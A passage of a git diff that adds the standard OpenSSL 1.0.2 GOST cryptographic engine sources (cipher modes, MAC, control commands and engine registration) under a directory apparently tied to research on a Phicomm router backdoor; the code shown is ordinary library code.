+IMPLEMENT_ASN1_FUNCTIONS(GOST_CIPHER_PARAMS)
+
+ASN1_NDEF_SEQUENCE(GOST_CLIENT_KEY_EXCHANGE_PARAMS) = { /* FIXME incomplete */
+    ASN1_SIMPLE(GOST_CLIENT_KEY_EXCHANGE_PARAMS, gkt, GOST_KEY_TRANSPORT)
+}
+
+ASN1_NDEF_SEQUENCE_END(GOST_CLIENT_KEY_EXCHANGE_PARAMS)
+IMPLEMENT_ASN1_FUNCTIONS(GOST_CLIENT_KEY_EXCHANGE_PARAMS)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_crypt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_crypt.c
new file mode 100644
index 0000000..2bbdc6c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_crypt.c
@@ -0,0 +1,623 @@
+/**********************************************************************
+ *                          gost_crypt.c                              *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *       OpenSSL interface to GOST 28147-89 cipher functions          *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include <string.h>
+#include "gost89.h"
+#include <openssl/rand.h>
+#include "e_gost_err.h"
+#include "gost_lcl.h"
+
+#if !defined(CCGOST_DEBUG) && !defined(DEBUG)
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+static int gost_cipher_init(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                            const unsigned char *iv, int enc);
+static int gost_cipher_init_cpa(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                                const unsigned char *iv, int enc);
+/* Handles block of data in CFB mode */
+static int gost_cipher_do_cfb(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t inl);
+/* Handles block of data in CNT mode */
+static int gost_cipher_do_cnt(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t inl);
+/* Cleanup function */
+static int gost_cipher_cleanup(EVP_CIPHER_CTX *);
+/* set/get cipher parameters */
+static int gost89_set_asn1_parameters(EVP_CIPHER_CTX *ctx, ASN1_TYPE *params);
+static int gost89_get_asn1_parameters(EVP_CIPHER_CTX *ctx, ASN1_TYPE *params);
+/* Control function */
+static int gost_cipher_ctl(EVP_CIPHER_CTX *ctx, int type, int arg, void *ptr);
+
+EVP_CIPHER cipher_gost = {
+    NID_id_Gost28147_89,
+    1,                          /* block_size */
+    32,                         /* key_size */
+    8,                          /* iv_len */
+    EVP_CIPH_CFB_MODE | EVP_CIPH_NO_PADDING |
+        EVP_CIPH_CUSTOM_IV | EVP_CIPH_RAND_KEY | EVP_CIPH_ALWAYS_CALL_INIT,
+    gost_cipher_init,
+    gost_cipher_do_cfb,
+    gost_cipher_cleanup,
+    sizeof(struct ossl_gost_cipher_ctx), /* ctx_size */
+    gost89_set_asn1_parameters,
+    gost89_get_asn1_parameters,
+    gost_cipher_ctl,
+    NULL,
+};
+
+EVP_CIPHER cipher_gost_cpacnt = {
+    NID_gost89_cnt,
+    1,                          /* block_size */
+    32,                         /* key_size */
+    8,                          /* iv_len */
+    EVP_CIPH_OFB_MODE | EVP_CIPH_NO_PADDING |
+        EVP_CIPH_CUSTOM_IV | EVP_CIPH_RAND_KEY | EVP_CIPH_ALWAYS_CALL_INIT,
+    gost_cipher_init_cpa,
+    gost_cipher_do_cnt,
+    gost_cipher_cleanup,
+    sizeof(struct ossl_gost_cipher_ctx), /* ctx_size */
+    gost89_set_asn1_parameters,
+    gost89_get_asn1_parameters,
+    gost_cipher_ctl,
+    NULL,
+};
+
+/* Implementation of GOST 28147-89 in MAC (imitovstavka) mode */
+/* Init functions which set specific parameters */
+static int gost_imit_init_cpa(EVP_MD_CTX *ctx);
+/* process block of data */
+static int gost_imit_update(EVP_MD_CTX *ctx, const void *data, size_t count);
+/* Return computed value */
+static int gost_imit_final(EVP_MD_CTX *ctx, unsigned char *md);
+/* Copies context */
+static int gost_imit_copy(EVP_MD_CTX *to, const EVP_MD_CTX *from);
+static int gost_imit_cleanup(EVP_MD_CTX *ctx);
+/* Control function, knows how to set MAC key.*/
+static int gost_imit_ctrl(EVP_MD_CTX *ctx, int type, int arg, void *ptr);
+
+EVP_MD imit_gost_cpa = {
+    NID_id_Gost28147_89_MAC,
+    NID_undef,
+    4,
+    0,
+    gost_imit_init_cpa,
+    gost_imit_update,
+    gost_imit_final,
+    gost_imit_copy,
+    gost_imit_cleanup,
+    NULL,
+    NULL,
+    {0, 0, 0, 0, 0},
+    8,
+    sizeof(struct ossl_gost_imit_ctx),
+    gost_imit_ctrl
+};
+
+/*
+ * Correspondence between gost parameter OIDs and substitution blocks
+ * NID field is filed by register_gost_NID function in engine.c
+ * upon engine initialization
+ */
+
+struct gost_cipher_info gost_cipher_list[] = {
+    /*- NID *//*
+     * Subst block
+     *//*
+     * Key meshing
+     */
+    /*
+     * {NID_id_GostR3411_94_CryptoProParamSet,&GostR3411_94_CryptoProParamSet,0},
+     */
+    {NID_id_Gost28147_89_cc, &GostR3411_94_CryptoProParamSet, 0},
+    {NID_id_Gost28147_89_CryptoPro_A_ParamSet, &Gost28147_CryptoProParamSetA,
+     1},
+    {NID_id_Gost28147_89_CryptoPro_B_ParamSet, &Gost28147_CryptoProParamSetB,
+     1},
+    {NID_id_Gost28147_89_CryptoPro_C_ParamSet, &Gost28147_CryptoProParamSetC,
+     1},
+    {NID_id_Gost28147_89_CryptoPro_D_ParamSet, &Gost28147_CryptoProParamSetD,
+     1},
+    {NID_id_Gost28147_89_TestParamSet, &Gost28147_TestParamSet, 1},
+    {NID_undef, NULL, 0}
+};
+
+/*
+ * get encryption parameters from crypto network settings FIXME For now we
+ * use environment var CRYPT_PARAMS as place to store these settings.
+ * Actually, it is better to use engine control command, read from
+ * configuration file to set them
+ */
+const struct gost_cipher_info *get_encryption_params(ASN1_OBJECT *obj)
+{
+    int nid;
+    struct gost_cipher_info *param;
+    if (!obj) {
+        const char *params = get_gost_engine_param(GOST_PARAM_CRYPT_PARAMS);
+        if (!params || !strlen(params))
+            return &gost_cipher_list[1];
+
+        nid = OBJ_txt2nid(params);
+        if (nid == NID_undef) {
+            GOSTerr(GOST_F_GET_ENCRYPTION_PARAMS,
+                    GOST_R_INVALID_CIPHER_PARAM_OID);
+            return NULL;
+        }
+    } else {
+        nid = OBJ_obj2nid(obj);
+    }
+    for (param = gost_cipher_list; param->sblock != NULL && param->nid != nid;
+         param++) ;
+    if (!param->sblock) {
+        GOSTerr(GOST_F_GET_ENCRYPTION_PARAMS, GOST_R_INVALID_CIPHER_PARAMS);
+        return NULL;
+    }
+    return param;
+}
+
+/* Sets cipher param from paramset NID. */
+static int gost_cipher_set_param(struct ossl_gost_cipher_ctx *c, int nid)
+{
+    const struct gost_cipher_info *param;
+    param =
+        get_encryption_params((nid == NID_undef ? NULL : OBJ_nid2obj(nid)));
+    if (!param)
+        return 0;
+
+    c->paramNID = param->nid;
+    c->key_meshing = param->key_meshing;
+    c->count = 0;
+    gost_init(&(c->cctx), param->sblock);
+    return 1;
+}
+
+/* Initializes EVP_CIPHER_CTX by paramset NID */
+static int gost_cipher_init_param(EVP_CIPHER_CTX *ctx,
+                                  const unsigned char *key,
+                                  const unsigned char *iv, int enc,
+                                  int paramNID, int mode)
+{
+    struct ossl_gost_cipher_ctx *c = ctx->cipher_data;
+    if (ctx->app_data == NULL) {
+        if (!gost_cipher_set_param(c, paramNID))
+            return 0;
+        ctx->app_data = ctx->cipher_data;
+    }
+    if (key)
+        gost_key(&(c->cctx), key);
+    if (iv)
+        memcpy(ctx->oiv, iv, EVP_CIPHER_CTX_iv_length(ctx));
+    memcpy(ctx->iv, ctx->oiv, EVP_CIPHER_CTX_iv_length(ctx));
+    return 1;
+}
+
+static int gost_cipher_init_cpa(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                                const unsigned char *iv, int enc)
+{
+    struct ossl_gost_cipher_ctx *c = ctx->cipher_data;
+    gost_init(&(c->cctx), &Gost28147_CryptoProParamSetA);
+    c->key_meshing = 1;
+    c->count = 0;
+    if (key)
+        gost_key(&(c->cctx), key);
+    if (iv)
+        memcpy(ctx->oiv, iv, EVP_CIPHER_CTX_iv_length(ctx));
+    memcpy(ctx->iv, ctx->oiv, EVP_CIPHER_CTX_iv_length(ctx));
+    return 1;
+}
+
+/* Initializes EVP_CIPHER_CTX with default values */
+int gost_cipher_init(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                     const unsigned char *iv, int enc)
+{
+    return gost_cipher_init_param(ctx, key, iv, enc, NID_undef,
+                                  EVP_CIPH_CFB_MODE);
+}
+
+/*
+ * Wrapper around gostcrypt function from gost89.c which perform key meshing
+ * when nesseccary
+ */
+static void gost_crypt_mesh(void *ctx, unsigned char *iv, unsigned char *buf)
+{
+    struct ossl_gost_cipher_ctx *c = ctx;
+    assert(c->count % 8 == 0 && c->count <= 1024);
+    if (c->key_meshing && c->count == 1024) {
+        cryptopro_key_meshing(&(c->cctx), iv);
+    }
+    gostcrypt(&(c->cctx), iv, buf);
+    c->count = c->count % 1024 + 8;
+}
+
+static void gost_cnt_next(void *ctx, unsigned char *iv, unsigned char *buf)
+{
+    struct ossl_gost_cipher_ctx *c = ctx;
+    word32 g, go;
+    unsigned char buf1[8];
+    assert(c->count % 8 == 0 && c->count <= 1024);
+    if (c->key_meshing && c->count == 1024) {
+        cryptopro_key_meshing(&(c->cctx), iv);
+    }
+    if (c->count == 0) {
+        gostcrypt(&(c->cctx), iv, buf1);
+    } else {
+        memcpy(buf1, iv, 8);
+    }
+    g = buf1[0] | (buf1[1] << 8) | (buf1[2] << 16) | ((word32) buf1[3] << 24);
+    g += 0x01010101;
+    buf1[0] = (unsigned char)(g & 0xff);
+    buf1[1] = (unsigned char)((g >> 8) & 0xff);
+    buf1[2] = (unsigned char)((g >> 16) & 0xff);
+    buf1[3] = (unsigned char)((g >> 24) & 0xff);
+    g = buf1[4] | (buf1[5] << 8) | (buf1[6] << 16) | ((word32) buf1[7] << 24);
+    go = g;
+    g += 0x01010104;
+    if (go > g)                 /* overflow */
+        g++;
+    buf1[4] = (unsigned char)(g & 0xff);
+    buf1[5] = (unsigned char)((g >> 8) & 0xff);
+    buf1[6] = (unsigned char)((g >> 16) & 0xff);
+    buf1[7] = (unsigned char)((g >> 24) & 0xff);
+    memcpy(iv, buf1, 8);
+    gostcrypt(&(c->cctx), buf1, buf);
+    c->count = c->count % 1024 + 8;
+}
+
+/* GOST encryption in CFB mode */
+int gost_cipher_do_cfb(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                       const unsigned char *in, size_t inl)
+{
+    const unsigned char *in_ptr = in;
+    unsigned char *out_ptr = out;
+    size_t i = 0;
+    size_t j = 0;
+/* process partial block if any */
+    if (ctx->num) {
+        for (j = ctx->num, i = 0; j < 8 && i < inl;
+             j++, i++, in_ptr++, out_ptr++) {
+            if (!ctx->encrypt)
+                ctx->buf[j + 8] = *in_ptr;
+            *out_ptr = ctx->buf[j] ^ (*in_ptr);
+            if (ctx->encrypt)
+                ctx->buf[j + 8] = *out_ptr;
+        }
+        if (j == 8) {
+            memcpy(ctx->iv, ctx->buf + 8, 8);
+            ctx->num = 0;
+        } else {
+            ctx->num = j;
+            return 1;
+        }
+    }
+
+    for (; i + 8 < inl; i += 8, in_ptr += 8, out_ptr += 8) {
+        /*
+         * block cipher current iv
+         */
+        gost_crypt_mesh(ctx->cipher_data, ctx->iv, ctx->buf);
+        /*
+         * xor next block of input text with it and output it
+         */
+        /*
+         * output this block
+         */
+        if (!ctx->encrypt)
+            memcpy(ctx->iv, in_ptr, 8);
+        for (j = 0; j < 8; j++) {
+            out_ptr[j] = ctx->buf[j] ^ in_ptr[j];
+        }
+        /* Encrypt */
+        /* Next iv is next block of cipher text */
+        if (ctx->encrypt)
+            memcpy(ctx->iv, out_ptr, 8);
+    }
+/* Process rest of buffer */
+    if (i < inl) {
+        gost_crypt_mesh(ctx->cipher_data, ctx->iv, ctx->buf);
+        if (!ctx->encrypt)
+            memcpy(ctx->buf + 8, in_ptr, inl - i);
+        for (j = 0; i < inl; j++, i++) {
+            out_ptr[j] = ctx->buf[j] ^ in_ptr[j];
+        }
+        ctx->num = j;
+        if (ctx->encrypt)
+            memcpy(ctx->buf + 8, out_ptr, j);
+    } else {
+        ctx->num = 0;
+    }
+    return 1;
+}
+
+static int gost_cipher_do_cnt(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                              const unsigned char *in, size_t inl)
+{
+    const unsigned char *in_ptr = in;
+    unsigned char *out_ptr = out;
+    size_t i = 0;
+    size_t j;
+/* process partial block if any */
+    if (ctx->num) {
+        for (j = ctx->num, i = 0; j < 8 && i < inl;
+             j++, i++, in_ptr++, out_ptr++) {
+            *out_ptr = ctx->buf[j] ^ (*in_ptr);
+        }
+        if (j == 8) {
+            ctx->num = 0;
+        } else {
+            ctx->num = j;
+            return 1;
+        }
+    }
+
+    for (; i + 8 < inl; i += 8, in_ptr += 8, out_ptr += 8) {
+        /*
+         * block cipher current iv
+         */
+        /* Encrypt */
+        gost_cnt_next(ctx->cipher_data, ctx->iv, ctx->buf);
+        /*
+         * xor next block of input text with it and output it
+         */
+        /*
+         * output this block
+         */
+        for (j = 0; j < 8; j++) {
+            out_ptr[j] = ctx->buf[j] ^ in_ptr[j];
+        }
+    }
+/* Process rest of buffer */
+    if (i < inl) {
+        gost_cnt_next(ctx->cipher_data, ctx->iv, ctx->buf);
+        for (j = 0; i < inl; j++, i++) {
+            out_ptr[j] = ctx->buf[j] ^ in_ptr[j];
+        }
+        ctx->num = j;
+    } else {
+        ctx->num = 0;
+    }
+    return 1;
+}
+
+/* Cleaning up of EVP_CIPHER_CTX */
+int gost_cipher_cleanup(EVP_CIPHER_CTX *ctx)
+{
+    gost_destroy(&((struct ossl_gost_cipher_ctx *)ctx->cipher_data)->cctx);
+    ctx->app_data = NULL;
+    return 1;
+}
+
+/* Control function for gost cipher */
+int gost_cipher_ctl(EVP_CIPHER_CTX *ctx, int type, int arg, void *ptr)
+{
+    switch (type) {
+    case EVP_CTRL_RAND_KEY:
+        {
+            if (RAND_bytes((unsigned char *)ptr, ctx->key_len) <= 0) {
+                GOSTerr(GOST_F_GOST_CIPHER_CTL,
+                        GOST_R_RANDOM_GENERATOR_ERROR);
+                return -1;
+            }
+            break;
+        }
+    case EVP_CTRL_PBE_PRF_NID:
+        if (ptr) {
+            *((int *)ptr) = NID_id_HMACGostR3411_94;
+            return 1;
+        } else {
+            return 0;
+        }
+
+    default:
+        GOSTerr(GOST_F_GOST_CIPHER_CTL,
+                GOST_R_UNSUPPORTED_CIPHER_CTL_COMMAND);
+        return -1;
+    }
+    return 1;
+}
+
+/* Set cipher parameters from ASN1 structure */
+int gost89_set_asn1_parameters(EVP_CIPHER_CTX *ctx, ASN1_TYPE *params)
+{
+    int len = 0;
+    unsigned char *buf = NULL;
+    unsigned char *p = NULL;
+    struct ossl_gost_cipher_ctx *c = ctx->cipher_data;
+    GOST_CIPHER_PARAMS *gcp = GOST_CIPHER_PARAMS_new();
+    ASN1_OCTET_STRING *os = NULL;
+    if (!gcp) {
+        GOSTerr(GOST_F_GOST89_SET_ASN1_PARAMETERS, GOST_R_NO_MEMORY);
+        return 0;
+    }
+    if (!ASN1_OCTET_STRING_set(gcp->iv, ctx->iv, ctx->cipher->iv_len)) {
+        GOST_CIPHER_PARAMS_free(gcp);
+        GOSTerr(GOST_F_GOST89_SET_ASN1_PARAMETERS, GOST_R_NO_MEMORY);
+        return 0;
+    }
+    ASN1_OBJECT_free(gcp->enc_param_set);
+    gcp->enc_param_set = OBJ_nid2obj(c->paramNID);
+
+    len = i2d_GOST_CIPHER_PARAMS(gcp, NULL);
+    p = buf = (unsigned char *)OPENSSL_malloc(len);
+    if (!buf) {
+        GOST_CIPHER_PARAMS_free(gcp);
+        GOSTerr(GOST_F_GOST89_SET_ASN1_PARAMETERS, GOST_R_NO_MEMORY);
+        return 0;
+    }
+    i2d_GOST_CIPHER_PARAMS(gcp, &p);
+    GOST_CIPHER_PARAMS_free(gcp);
+
+    os = ASN1_OCTET_STRING_new();
+
+    if (!os || !ASN1_OCTET_STRING_set(os, buf, len)) {
+        OPENSSL_free(buf);
+        GOSTerr(GOST_F_GOST89_SET_ASN1_PARAMETERS, GOST_R_NO_MEMORY);
+        return 0;
+    }
+    OPENSSL_free(buf);
+
+    ASN1_TYPE_set(params, V_ASN1_SEQUENCE, os);
+    return 1;
+}
+
+/* Store parameters into ASN1 structure */
+int gost89_get_asn1_parameters(EVP_CIPHER_CTX *ctx, ASN1_TYPE *params)
+{
+    int ret = -1;
+    int len;
+    GOST_CIPHER_PARAMS *gcp = NULL;
+    unsigned char *p;
+    struct ossl_gost_cipher_ctx *c = ctx->cipher_data;
+    if (ASN1_TYPE_get(params) != V_ASN1_SEQUENCE) {
+        return ret;
+    }
+
+    p = params->value.sequence->data;
+
+    gcp = d2i_GOST_CIPHER_PARAMS(NULL, (const unsigned char **)&p,
+                                 params->value.sequence->length);
+
+    len = gcp->iv->length;
+    if (len != ctx->cipher->iv_len) {
+        GOST_CIPHER_PARAMS_free(gcp);
+        GOSTerr(GOST_F_GOST89_GET_ASN1_PARAMETERS, GOST_R_INVALID_IV_LENGTH);
+        return -1;
+    }
+    if (!gost_cipher_set_param(c, OBJ_obj2nid(gcp->enc_param_set))) {
+        GOST_CIPHER_PARAMS_free(gcp);
+        return -1;
+    }
+    memcpy(ctx->oiv, gcp->iv->data, len);
+
+    GOST_CIPHER_PARAMS_free(gcp);
+
+    return 1;
+}
+
+int gost_imit_init_cpa(EVP_MD_CTX *ctx)
+{
+    struct ossl_gost_imit_ctx *c = ctx->md_data;
+    memset(c->buffer, 0, sizeof(c->buffer));
+    memset(c->partial_block, 0, sizeof(c->partial_block));
+    c->count = 0;
+    c->bytes_left = 0;
+    c->key_meshing = 1;
+    gost_init(&(c->cctx), &Gost28147_CryptoProParamSetA);
+    return 1;
+}
+
+static void mac_block_mesh(struct ossl_gost_imit_ctx *c,
+                           const unsigned char *data)
+{
+    unsigned char buffer[8];
+    /*
+     * We are using local buffer for iv because CryptoPro doesn't interpret
+     * internal state of MAC algorithm as iv during keymeshing (but does
+     * initialize internal state from iv in key transport
+     */
+    assert(c->count % 8 == 0 && c->count <= 1024);
+    if (c->key_meshing && c->count == 1024) {
+        cryptopro_key_meshing(&(c->cctx), buffer);
+    }
+    mac_block(&(c->cctx), c->buffer, data);
+    c->count = c->count % 1024 + 8;
+}
+
+int gost_imit_update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    struct ossl_gost_imit_ctx *c = ctx->md_data;
+    const unsigned char *p = data;
+    size_t bytes = count, i;
+    if (!(c->key_set)) {
+        GOSTerr(GOST_F_GOST_IMIT_UPDATE, GOST_R_MAC_KEY_NOT_SET);
+        return 0;
+    }
+    if (c->bytes_left) {
+        for (i = c->bytes_left; i < 8 && bytes > 0; bytes--, i++, p++) {
+            c->partial_block[i] = *p;
+        }
+        if (i == 8) {
+            mac_block_mesh(c, c->partial_block);
+        } else {
+            c->bytes_left = i;
+            return 1;
+        }
+    }
+    while (bytes > 8) {
+        mac_block_mesh(c, p);
+        p += 8;
+        bytes -= 8;
+    }
+    if (bytes > 0) {
+        memcpy(c->partial_block, p, bytes);
+    }
+    c->bytes_left = bytes;
+    return 1;
+}
+
+int gost_imit_final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    struct ossl_gost_imit_ctx *c = ctx->md_data;
+    if (!c->key_set) {
+        GOSTerr(GOST_F_GOST_IMIT_FINAL, GOST_R_MAC_KEY_NOT_SET);
+        return 0;
+    }
+    if (c->count == 0 && c->bytes_left) {
+        unsigned char buffer[8];
+        memset(buffer, 0, 8);
+        gost_imit_update(ctx, buffer, 8);
+    }
+    if (c->bytes_left) {
+        int i;
+        for (i = c->bytes_left; i < 8; i++) {
+            c->partial_block[i] = 0;
+        }
+        mac_block_mesh(c, c->partial_block);
+    }
+    get_mac(c->buffer, 32, md);
+    return 1;
+}
+
+int gost_imit_ctrl(EVP_MD_CTX *ctx, int type, int arg, void *ptr)
+{
+    switch (type) {
+    case EVP_MD_CTRL_KEY_LEN:
+        *((unsigned int *)(ptr)) = 32;
+        return 1;
+    case EVP_MD_CTRL_SET_KEY:
+        {
+            if (arg != 32) {
+                GOSTerr(GOST_F_GOST_IMIT_CTRL, GOST_R_INVALID_MAC_KEY_LENGTH);
+                return 0;
+            }
+
+            gost_key(&(((struct ossl_gost_imit_ctx *)(ctx->md_data))->cctx),
+                     ptr);
+            ((struct ossl_gost_imit_ctx *)(ctx->md_data))->key_set = 1;
+            return 1;
+
+        }
+    default:
+        return 0;
+    }
+}
+
+int gost_imit_copy(EVP_MD_CTX *to, const EVP_MD_CTX *from)
+{
+    memcpy(to->md_data, from->md_data, sizeof(struct ossl_gost_imit_ctx));
+    return 1;
+}
+
+/* Clean up imit ctx */
+int gost_imit_cleanup(EVP_MD_CTX *ctx)
+{
+    memset(ctx->md_data, 0, sizeof(struct ossl_gost_imit_ctx));
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_ctl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_ctl.c
new file mode 100644
index 0000000..6c93c45
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_ctl.c
@@ -0,0 +1,93 @@
+/**********************************************************************
+ *                        gost_ctl.c                                  *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *       This file is distributed under the same license as OpenSSL   *
+ *                                                                    *
+ *        Implementation of control commands for GOST engine          *
+ *            OpenSSL 0.9.9 libraries required                        *
+ **********************************************************************/
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/err.h>
+#include <openssl/engine.h>
+#include <openssl/buffer.h>
+#include "gost_lcl.h"
+
+static char *gost_params[GOST_PARAM_MAX + 1] = { NULL };
+static const char *gost_envnames[] = { "CRYPT_PARAMS" };
+
+const ENGINE_CMD_DEFN gost_cmds[] = {
+/*- { GOST_CTRL_RNG,
+    "RNG",
+    "Type of random number generator to use",
+    ENGINE_CMD_FLAG_STRING
+    },
+    { GOST_CTRL_RNG_PARAMS,
+    "RNG_PARAMS",
+    "Parameter for random number generator",
+    ENGINE_CMD_FLAG_STRING
+    },
+*/ {GOST_CTRL_CRYPT_PARAMS,
+           "CRYPT_PARAMS",
+           "OID of default GOST 28147-89 parameters",
+           ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+void gost_param_free()
+{
+    int i;
+    for (i = 0; i <= GOST_PARAM_MAX; i++)
+        if (gost_params[i] != NULL) {
+            OPENSSL_free(gost_params[i]);
+            gost_params[i] = NULL;
+        }
+
+}
+
+int gost_control_func(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int param = cmd - ENGINE_CMD_BASE;
+    int ret = 0;
+    if (param < 0 || param > GOST_PARAM_MAX)
+        return -1;
+    ret = gost_set_default_param(param, p);
+    return ret;
+}
+
+const char *get_gost_engine_param(int param)
+{
+    char *tmp;
+    if (param < 0 || param > GOST_PARAM_MAX)
+        return NULL;
+    if (gost_params[param] != NULL) {
+        return gost_params[param];
+    }
+    tmp = getenv(gost_envnames[param]);
+    if (tmp) {
+        if (gost_params[param])
+            OPENSSL_free(gost_params[param]);
+        gost_params[param] = BUF_strdup(tmp);
+        return gost_params[param];
+    }
+    return NULL;
+}
+
+int gost_set_default_param(int param, const char *value)
+{
+    const char *tmp;
+    if (param < 0 || param > GOST_PARAM_MAX)
+        return 0;
+    tmp = getenv(gost_envnames[param]);
+    /*
+     * if there is value in the environment, use it, else -passed string *
+     */
+    if (!tmp)
+        tmp = value;
+    if (gost_params[param])
+        OPENSSL_free(gost_params[param]);
+    gost_params[param] = BUF_strdup(tmp);
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_eng.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_eng.c
new file mode 100644
index 0000000..971a1ed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_eng.c
@@ -0,0 +1,277 @@
+/**********************************************************************
+ *                          gost_eng.c                                *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *              Main file of GOST engine                              *
+ *       for OpenSSL                                                  *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/engine.h>
+#include <openssl/obj_mac.h>
+#include "e_gost_err.h"
+#include "gost_lcl.h"
+static const char *engine_gost_id = "gost";
+static const char *engine_gost_name =
+    "Reference implementation of GOST engine";
+
+/* Symmetric cipher and digest function registrar */
+
+static int gost_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                        const int **nids, int nid);
+
+static int gost_digests(ENGINE *e, const EVP_MD **digest,
+                        const int **nids, int ind);
+
+static int gost_pkey_meths(ENGINE *e, EVP_PKEY_METHOD **pmeth,
+                           const int **nids, int nid);
+
+static int gost_pkey_asn1_meths(ENGINE *e, EVP_PKEY_ASN1_METHOD **ameth,
+                                const int **nids, int nid);
+
+static int gost_cipher_nids[] = { NID_id_Gost28147_89, NID_gost89_cnt, 0 };
+
+static int gost_digest_nids[] =
+    { NID_id_GostR3411_94, NID_id_Gost28147_89_MAC, 0 };
+
+static int gost_pkey_meth_nids[] = { NID_id_GostR3410_94,
+    NID_id_GostR3410_2001, NID_id_Gost28147_89_MAC, 0
+};
+
+static EVP_PKEY_METHOD *pmeth_GostR3410_94 = NULL,
+    *pmeth_GostR3410_2001 = NULL, *pmeth_Gost28147_MAC = NULL;
+
+static EVP_PKEY_ASN1_METHOD *ameth_GostR3410_94 = NULL,
+    *ameth_GostR3410_2001 = NULL, *ameth_Gost28147_MAC = NULL;
+
+static int gost_engine_init(ENGINE *e)
+{
+    return 1;
+}
+
+static int gost_engine_finish(ENGINE *e)
+{
+    return 1;
+}
+
+static int gost_engine_destroy(ENGINE *e)
+{
+    gost_param_free();
+
+    pmeth_GostR3410_94 = NULL;
+    pmeth_GostR3410_2001 = NULL;
+    pmeth_Gost28147_MAC = NULL;
+    ameth_GostR3410_94 = NULL;
+    ameth_GostR3410_2001 = NULL;
+    ameth_Gost28147_MAC = NULL;
+    return 1;
+}
+
+static int bind_gost(ENGINE *e, const char *id)
+{
+    int ret = 0;
+    if (id && strcmp(id, engine_gost_id))
+        return 0;
+
+    if (!ENGINE_set_id(e, engine_gost_id)) {
+        printf("ENGINE_set_id failed\n");
+        goto end;
+    }
+    if (!ENGINE_set_name(e, engine_gost_name)) {
+        printf("ENGINE_set_name failed\n");
+        goto end;
+    }
+    if (!ENGINE_set_digests(e, gost_digests)) {
+        printf("ENGINE_set_digests failed\n");
+        goto end;
+    }
+    if (!ENGINE_set_ciphers(e, gost_ciphers)) {
+        printf("ENGINE_set_ciphers failed\n");
+        goto end;
+    }
+    if (!ENGINE_set_pkey_meths(e, gost_pkey_meths)) {
+        printf("ENGINE_set_pkey_meths failed\n");
+        goto end;
+    }
+    if (!ENGINE_set_pkey_asn1_meths(e, gost_pkey_asn1_meths)) {
+        printf("ENGINE_set_pkey_asn1_meths failed\n");
+        goto end;
+    }
+    /* Control function and commands */
+    if (!ENGINE_set_cmd_defns(e, gost_cmds)) {
+        fprintf(stderr, "ENGINE_set_cmd_defns failed\n");
+        goto end;
+    }
+    if (!ENGINE_set_ctrl_function(e, gost_control_func)) {
+        fprintf(stderr, "ENGINE_set_ctrl_func failed\n");
+        goto end;
+    }
+    if (!ENGINE_set_destroy_function(e, gost_engine_destroy)
+        || !ENGINE_set_init_function(e, gost_engine_init)
+        || !ENGINE_set_finish_function(e, gost_engine_finish)) {
+        goto end;
+    }
+
+    if (!register_ameth_gost
+        (NID_id_GostR3410_94, &ameth_GostR3410_94, "GOST94",
+         "GOST R 34.10-94"))
+        goto end;
+    if (!register_ameth_gost
+        (NID_id_GostR3410_2001, &ameth_GostR3410_2001, "GOST2001",
+         "GOST R 34.10-2001"))
+        goto end;
+    if (!register_ameth_gost(NID_id_Gost28147_89_MAC, &ameth_Gost28147_MAC,
+                             "GOST-MAC", "GOST 28147-89 MAC"))
+        goto end;
+
+    if (!register_pmeth_gost(NID_id_GostR3410_94, &pmeth_GostR3410_94, 0))
+        goto end;
+    if (!register_pmeth_gost(NID_id_GostR3410_2001, &pmeth_GostR3410_2001, 0))
+        goto end;
+    if (!register_pmeth_gost
+        (NID_id_Gost28147_89_MAC, &pmeth_Gost28147_MAC, 0))
+        goto end;
+    if (!ENGINE_register_ciphers(e)
+        || !ENGINE_register_digests(e)
+        || !ENGINE_register_pkey_meths(e)
+        /* These two actually should go in LIST_ADD command */
+        || !EVP_add_cipher(&cipher_gost)
+        || !EVP_add_cipher(&cipher_gost_cpacnt)
+        || !EVP_add_digest(&digest_gost)
+        || !EVP_add_digest(&imit_gost_cpa)
+        ) {
+        goto end;
+    }
+
+    ERR_load_GOST_strings();
+    ret = 1;
+ end:
+    return ret;
+}
+
+#ifndef OPENSSL_NO_DYNAMIC_ENGINE
+IMPLEMENT_DYNAMIC_BIND_FN(bind_gost)
